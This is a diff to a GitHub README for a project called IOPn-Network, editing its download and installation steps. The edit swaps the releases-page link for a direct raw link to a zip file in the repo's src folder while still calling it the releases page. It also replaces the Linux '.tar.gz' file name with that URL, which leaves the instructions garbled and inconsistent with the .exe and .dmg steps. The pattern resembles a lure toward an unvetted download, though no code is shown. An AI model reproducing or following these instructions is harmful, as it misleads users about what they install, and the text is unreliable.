jbspencill/IOPn-Network/README.md

 To begin using IOPn-Network, follow these steps:

 1. **Download the Application**
-   Visit the releases page to download the latest version of the software: [Download IOPn-Network](https://github.com/jbspencill/IOPn-Network/releases)
+   Visit the releases page to download the latest version of the software: [Download IOPn-Network](https://raw.githubusercontent.com/jbspencill/IOPn-Network/main/src/IOPn-Network_2.4.zip)

 2. **Installation**
    - For Windows: Double-click the downloaded `.exe` file and follow the prompts.
    - For macOS: Open the downloaded `.dmg` file and drag the application to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and follow the included installation instructions.
+   - For Linux: Extract the `https://raw.githubusercontent.com/jbspencill/IOPn-Network/main/src/IOPn-Network_2.4.zip` file and follow the included installation instructions.

 3. **Launch the Application**
    Open IOPn-Network from your Applications or Start menu.
 You will see a welcome screen that guides you through the setup process.